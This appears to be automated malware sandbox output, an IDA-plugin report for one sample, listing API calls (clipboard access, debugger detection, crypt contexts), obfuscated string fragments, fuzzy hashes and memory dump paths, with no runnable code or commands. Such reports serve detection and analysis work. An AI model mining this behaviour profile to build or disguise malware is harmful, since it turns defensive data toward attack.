                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2538663250-0
                                                                                                                  • Opcode ID: a25ab9109f3d3541e02e38eafc44524233b353671a7f5019b2851014eed3edcb
                                                                                                                  • Instruction ID: 37f0727ff88642b787521174195b22b3165ce90bd0762f1725373de6e61a95c3
                                                                                                                  • Opcode Fuzzy Hash: a25ab9109f3d3541e02e38eafc44524233b353671a7f5019b2851014eed3edcb
                                                                                                                  • Instruction Fuzzy Hash: 7DE02B31FA11041BE304672CDC0BF8A3A1E93C6360F088235A211C67E9E93CA856C159
                                                                                                                  APIs
                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C950
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeSecurity
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 640775948-0
                                                                                                                  • Opcode ID: b00ed48d21e8d6b8f1fb8b63251f62e37b9ddfa6e67e49aec58d758fc7eb299c
                                                                                                                  • Instruction ID: 1b92964ae9c8a0e0a6f749654b3c852f3ad484dfbff75f12e03543587c657db6
                                                                                                                  • Opcode Fuzzy Hash: b00ed48d21e8d6b8f1fb8b63251f62e37b9ddfa6e67e49aec58d758fc7eb299c
                                                                                                                  • Instruction Fuzzy Hash: E1E01735BC520067F7284608EC47F4422535382F21F3C8226B312FE7E8E9A8A001410C
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?,?,00439DD0), ref: 00438560
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: b1ada83ec4012304df24ae6854d180094443cd6a3481925689b5f910172c1123
                                                                                                                  • Instruction ID: 00f352df6ed085bcf73a54b18d0cd417c1e8254c01ad145fbb60ffdf05646862
                                                                                                                  • Opcode Fuzzy Hash: b1ada83ec4012304df24ae6854d180094443cd6a3481925689b5f910172c1123
                                                                                                                  • Instruction Fuzzy Hash: 5AC09B31045120AFD5502B15FC05FC63F54DF55375F014055B14467172C761BC82C6DC
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                  • String ID: .$Y$[$\$`$c$d$e$g$j$l$z
                                                                                                                  • API String ID: 2832541153-2078725520
                                                                                                                  • Opcode ID: b02562f9b126e923e6745480620a71e2c506461f439a6dc04addfcacb6fc504d
                                                                                                                  • Instruction ID: 34ece6c18be3c3dc7650849af3ebc91d39a4b8b5f9aba95e03bd70d8208d34c8
                                                                                                                  • Opcode Fuzzy Hash: b02562f9b126e923e6745480620a71e2c506461f439a6dc04addfcacb6fc504d
                                                                                                                  • Instruction Fuzzy Hash: 8541A17150C7808ED300EF78D99835FBFE09B95314F088A3EE5D98A282D679855DCBA7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: *+$7($IC$MN$NK$V5$i}$q:s<$sF+X$wBtD$zz$}r$02$35$79$<>$RST$^P${}
                                                                                                                  • API String ID: 0-1770178174
                                                                                                                  • Opcode ID: 06a3d6a823a9bfc3696c8ae16ace9e56210287fdb9f1687bb38651e152501e00
                                                                                                                  • Instruction ID: bfa19e531ae2230c3e439caa4c7f29b2efdd26e24159ab1956b24a50d58d668d
                                                                                                                  • Opcode Fuzzy Hash: 06a3d6a823a9bfc3696c8ae16ace9e56210287fdb9f1687bb38651e152501e00
                                                                                                                  • Instruction Fuzzy Hash: 1FA262B560C3918BC334CF24D4417ABBBF2FBC2704F40892DE5D95B251E7759A4A8B8A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: *+$7($IC$MN$NK$V5$i}$q:s<$sF+X$wBtD$zz$}r$02$35$79$<>$RST$^P${}
                                                                                                                  • API String ID: 0-1770178174
                                                                                                                  • Opcode ID: 5e72d88c3049cae1f9b57451ea9c476af6ad9d3158b4602070947b49a941448b
                                                                                                                  • Instruction ID: 7a613edb201a7144dd42080cbd371573025cbb79147fe86f555ad8c126c2d898
                                                                                                                  • Opcode Fuzzy Hash: 5e72d88c3049cae1f9b57451ea9c476af6ad9d3158b4602070947b49a941448b
                                                                                                                  • Instruction Fuzzy Hash: 51824FB560C3918BD334CF14D441BABBBF2EBC2304F40892DE5D96B251D7759A4A8B8B
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00439DF0: LdrInitializeThunk.NTDLL(0043BEAB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E1E
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 004197CA
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0041984B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary$InitializeThunk
                                                                                                                  • String ID: &Z%\$'V.h$1B&D$7F4X$<^+P$I,~M$ef
                                                                                                                  • API String ID: 764372645-3042980244
                                                                                                                  • Opcode ID: b5cf74329583fb6dc28f109f741bad194bfc5361b5aff80978676ceb2c5dc174
                                                                                                                  • Instruction ID: 4b32854c7adb2e36c83dc4de8b600ec710a23a622ab1c4226f67f038759c5c60
                                                                                                                  • Opcode Fuzzy Hash: b5cf74329583fb6dc28f109f741bad194bfc5361b5aff80978676ceb2c5dc174
                                                                                                                  • Instruction Fuzzy Hash: D9823A756093409BD715CF24C89076FBBD3AFD9704F28892DE4868B391E638EC85CB5A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "A;C$4E{G$A)O+$HI$K%M'$K=a?$W5P7$g9W;$o1m3
                                                                                                                  • API String ID: 0-409907040
                                                                                                                  • Opcode ID: dfbe12f6cf855b52727505a631966c4896db4082a266d60f67f7d3a36d6e034e
                                                                                                                  • Instruction ID: f3beb451a55df6ef81444f5226d72f162fa03879b0bef2b86c1921b2ec460b48
                                                                                                                  • Opcode Fuzzy Hash: dfbe12f6cf855b52727505a631966c4896db4082a266d60f67f7d3a36d6e034e
                                                                                                                  • Instruction Fuzzy Hash: 4A3137769183508BD708DF24CC9122BB7B1EFD5350F0A893CE4C29B755E3388A05C78A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "A;C$4E{G$A)O+$HI$K%M'$K=a?$W5P7$g9W;$o1m3
                                                                                                                  • API String ID: 0-409907040
                                                                                                                  • Opcode ID: 8dc344fedd4e0d0243a31ff6f350895c444f5dee2a627dccb60d8db24d9f15fc
                                                                                                                  • Instruction ID: 008ca852c5b5364f71a5bf04fffa82340e674bf844c2cc4081172530cf1ddf43
                                                                                                                  • Opcode Fuzzy Hash: 8dc344fedd4e0d0243a31ff6f350895c444f5dee2a627dccb60d8db24d9f15fc
                                                                                                                  • Instruction Fuzzy Hash: 7731357691C3948BD3148F14CC9022BBBA1EFD5710F0A8A2CE8C16B755E3788A01CB8A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: |G$"qA$+x$A>Z0$D&Z8$F"Q$$Y67H$_.P
                                                                                                                  • API String ID: 0-3507257672
                                                                                                                  • Opcode ID: a78423b1aa92a00a60e32b35e2b103679efca1386eb9b84e49937ba7d09d80ba
                                                                                                                  • Instruction ID: e780818630244df4e0738c155b7ce0f43d14575b734267895fe9f7447747bd08
                                                                                                                  • Opcode Fuzzy Hash: a78423b1aa92a00a60e32b35e2b103679efca1386eb9b84e49937ba7d09d80ba
                                                                                                                  • Instruction Fuzzy Hash: 4C3239716083118BC324CF24C8D06ABB7F2EFC9354F198A2DE9C59B361E7789985C756
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: GAv~$GAv~$mpuv$mpuv$vuGO$vuGO$~r$~r
                                                                                                                  • API String ID: 0-3198300620
                                                                                                                  • Opcode ID: de6b9d48cb82764d41e673354b8639769d3e33e2457edd340b8ca72ce5df5bca
                                                                                                                  • Instruction ID: 498bc63cd0788a0fa09f7b11f375181eb978baea08b83ba7137193302551c8b2
                                                                                                                  • Opcode Fuzzy Hash: de6b9d48cb82764d41e673354b8639769d3e33e2457edd340b8ca72ce5df5bca
                                                                                                                  • Instruction Fuzzy Hash: C5315A3592C3A08BD3408F25D84015BBBD1ABC5344F69862DFCD4AB3A4D9748940879F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: &$6|tx$A\$C]$EE}H$flfc$ndnk
                                                                                                                  • API String ID: 0-2838787765
                                                                                                                  • Opcode ID: 22cce4e556a79413b527edd0d19770c08411aa6b193af229ae3e0d5c5912b391
                                                                                                                  • Instruction ID: 96fe208ec5adad25163823696c2573b3fe5d12c39b3c9f596b6d3037b357e5e3
                                                                                                                  • Opcode Fuzzy Hash: 22cce4e556a79413b527edd0d19770c08411aa6b193af229ae3e0d5c5912b391
                                                                                                                  • Instruction Fuzzy Hash: 5602EDB060C3409FD3109F28D89176BBBE2EFC2314F54482DE5C68B3A2E7399945CB5A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: =$I4$ZaX3$[abZ$^a[R$cAYo$fa
                                                                                                                  • API String ID: 0-4131729241
                                                                                                                  • Opcode ID: 405195fbabe1a99b8fe7ce7e2eb3e03672651c921e0400c673a09164baca598c
                                                                                                                  • Instruction ID: 9fb4c51dd36001abaa1e44a4867fa139af67d486df07941b5c6fb338e4f53a06
                                                                                                                  • Opcode Fuzzy Hash: 405195fbabe1a99b8fe7ce7e2eb3e03672651c921e0400c673a09164baca598c
                                                                                                                  • Instruction Fuzzy Hash: 3DB1E57160C3914BC3168F7984A076BFFE19FD7204F48897DE4D56B382D639890ACB9A
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,00D9C747,?,00000000), ref: 00D9CE0F
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,00D9C747,?,00000000), ref: 00D9CE38
                                                                                                                  • GetACP.KERNEL32(?,?,00D9C747,?,00000000), ref: 00D9CE4D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID: ACP$OCP
                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                  • Opcode ID: 6f3e65b028d901b59b2e695b4eab03c167944b628aae05a44ee3feefb8fdaaaf
                                                                                                                  • Instruction ID: 0fc6945f2c79d253734742c2b525c288fcfdee3babc7e08326dc03ef9e894f08
                                                                                                                  • Opcode Fuzzy Hash: 6f3e65b028d901b59b2e695b4eab03c167944b628aae05a44ee3feefb8fdaaaf
                                                                                                                  • Instruction Fuzzy Hash: 3221A122A60201EAEF359F64C900B9777A6EB54B64B5AA574F90BD7204F732DE41C3B0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(00000000,?,00D999B2), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000,?,?,00000028,00D9412A), ref: 00D97679
                                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 00D9C719
                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00D9C757
                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00D9C76A
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00D9C7B2
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00D9C7CD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 415426439-0
                                                                                                                  • Opcode ID: 665bc5eaed21e9a4ca380d816de1657ad444bbad024384dabe4783436501a8b2
                                                                                                                  • Instruction ID: e0c77f3c6ba1d87a115fe11664db45f6c3fad82092b2eec64910ad2103614469
                                                                                                                  • Opcode Fuzzy Hash: 665bc5eaed21e9a4ca380d816de1657ad444bbad024384dabe4783436501a8b2
                                                                                                                  • Instruction Fuzzy Hash: AA516D71A20205AFEF10EFA5CC81ABB77B8FF49700F485569E911E7291EB70D9048BB1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: =$CE;F$I@I9$Y-AE$a
                                                                                                                  • API String ID: 0-3389986099
                                                                                                                  • Opcode ID: b5f0f7cb0e6ae96fff35c19959799b81b4123266052ccca757f0ce7cb59562df
                                                                                                                  • Instruction ID: 7d8f140b44a49b6e2ef46ae00a622f98273c80f69ba2163a61e2a2a483065708
                                                                                                                  • Opcode Fuzzy Hash: b5f0f7cb0e6ae96fff35c19959799b81b4123266052ccca757f0ce7cb59562df
                                                                                                                  • Instruction Fuzzy Hash: 535258B490C3508FC725DF24C8407AFBBE1AF96314F08866EE8D55B392D7398946CB96
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "2$3-$>+$?+$=?
                                                                                                                  • API String ID: 0-2299533537
                                                                                                                  • Opcode ID: 547dcb5cf7652dbbacdc4cb9f5e37e6dce14e9fb5fdc8f1e64ffa4f6896b99bb
                                                                                                                  • Instruction ID: 1a799a2e98b600fa1da2e76793366819dd7b177f36baef7441702b602b875c71
                                                                                                                  • Opcode Fuzzy Hash: 547dcb5cf7652dbbacdc4cb9f5e37e6dce14e9fb5fdc8f1e64ffa4f6896b99bb
                                                                                                                  • Instruction Fuzzy Hash: 1EE112B4208340EFE724DF24E88176FB7A1FB86709F90582DE58597361EB38D945CB4A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 88FE57294B3FC45EE430B6CE554835A9$<208$<208$N$e32t
                                                                                                                  • API String ID: 0-1182029055
                                                                                                                  • Opcode ID: 367741fb7b931ac47e500ccf61d2cd1ddbe63bd8d08a3116b8b6d2552f41cbba
                                                                                                                  • Instruction ID: 20a34227f67ee4d44eeee74c06e5bcbd5afa54145c4ff8f541f3cb8b1a67e39a
                                                                                                                  • Opcode Fuzzy Hash: 367741fb7b931ac47e500ccf61d2cd1ddbe63bd8d08a3116b8b6d2552f41cbba
                                                                                                                  • Instruction Fuzzy Hash: A8B1E2B150C3808BD718DF65D85166FBBE6EBD2314F14892DF4D19B382DA38C90ACB56
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: C+dY$C+dY$G+dY$G+dY$[<
                                                                                                                  • API String ID: 0-2974196941
                                                                                                                  • Opcode ID: ddbf06d5e3c392c75608772084daf204ca4e51145b9c43d9e0e44902391ade6f
                                                                                                                  • Instruction ID: c09d43f335869f7b8f9f12aca26faa345d536313cf1147758d8abc3c2bc18c8b
                                                                                                                  • Opcode Fuzzy Hash: ddbf06d5e3c392c75608772084daf204ca4e51145b9c43d9e0e44902391ade6f
                                                                                                                  • Instruction Fuzzy Hash: CF5168746082918FD719CF3594E0773BBA29F97310B2C849DC8D69F716CA39A806CB69
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0370feb49d06202b0a8a2cb5e48f043198ba8953b6faff8e379c5fb6cd4322bb
                                                                                                                  • Instruction ID: 37a066dc76fa12c51f4ac807f9bda618589c05416ca614a213ac30e317d27d68
                                                                                                                  • Opcode Fuzzy Hash: 0370feb49d06202b0a8a2cb5e48f043198ba8953b6faff8e379c5fb6cd4322bb
                                                                                                                  • Instruction Fuzzy Hash: 7B023C71E016199FDF15CFA8D8806AEFBF1FF48324F288269D519A7344D731AA41CBA4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: '^$5_lh$aQba$xSnU$%x|
                                                                                                                  • API String ID: 0-882101050
                                                                                                                  • Opcode ID: 9ec8c59b63fa95e16ec6860a31bbfe7fb180b078cc479365ec457ae7cba96df4
                                                                                                                  • Instruction ID: e51e21ca4a307056c8b4c0eb2cc43503f709736d3fb72366ef66dfb884cae854
                                                                                                                  • Opcode Fuzzy Hash: 9ec8c59b63fa95e16ec6860a31bbfe7fb180b078cc479365ec457ae7cba96df4
                                                                                                                  • Instruction Fuzzy Hash: 6E21043411A3818BD358CF1881A06ABBBE2AFC2344F9C5A1DE4C18B255D734C952CB47
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D8B658
                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00D8B724
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D8B73D
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00D8B747
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 254469556-0
                                                                                                                  • Opcode ID: d318e8fffb9ec372393fd68b63d7949c9c464b080420d8ee76903cb14cdc01b4
                                                                                                                  • Instruction ID: cef39a7529c0de3d492e38f6b796ca9cae303d47f5585dbe69553e711835a545
                                                                                                                  • Opcode Fuzzy Hash: d318e8fffb9ec372393fd68b63d7949c9c464b080420d8ee76903cb14cdc01b4
                                                                                                                  • Instruction Fuzzy Hash: 4731F875D01318DBEF20EF65D98A7CDBBB8EF08310F1041AAE40CAB250EB719A858F55
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ContextCryptErrorLast
                                                                                                                  • String ID: [+]
                                                                                                                  • API String ID: 3905322190-4228040803
                                                                                                                  • Opcode ID: e63e81e63c9a5b55fe565538083e8ededd424f616d3ee076845fea44b8024647
                                                                                                                  • Instruction ID: bebea69b8ce9923d095444d6482f92dc2abf4670e02574bd3305f18181162d5c
                                                                                                                  • Opcode Fuzzy Hash: e63e81e63c9a5b55fe565538083e8ededd424f616d3ee076845fea44b8024647
                                                                                                                  • Instruction Fuzzy Hash: E87138B494522DCBCB64EF68D8987E9BBF0AF28304F1044E9E88D97351D6749AC4CF61
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @KLM$LO$lZPh$8O
                                                                                                                  • API String ID: 0-3822996971
                                                                                                                  • Opcode ID: 18458ae4d7026277bbd0485411983029d0bbd548028fd866e28c3a016821418c
                                                                                                                  • Instruction ID: e5e404e926c62b15b78a954f1dce4a60e5ad98ee9bd4274b2ff5830d2d540624
                                                                                                                  • Opcode Fuzzy Hash: 18458ae4d7026277bbd0485411983029d0bbd548028fd866e28c3a016821418c
                                                                                                                  • Instruction Fuzzy Hash: C9C1227220C3504BD324DF2484512ABFBE3DBC2304F19897EE5D56B382D6799916CB8B
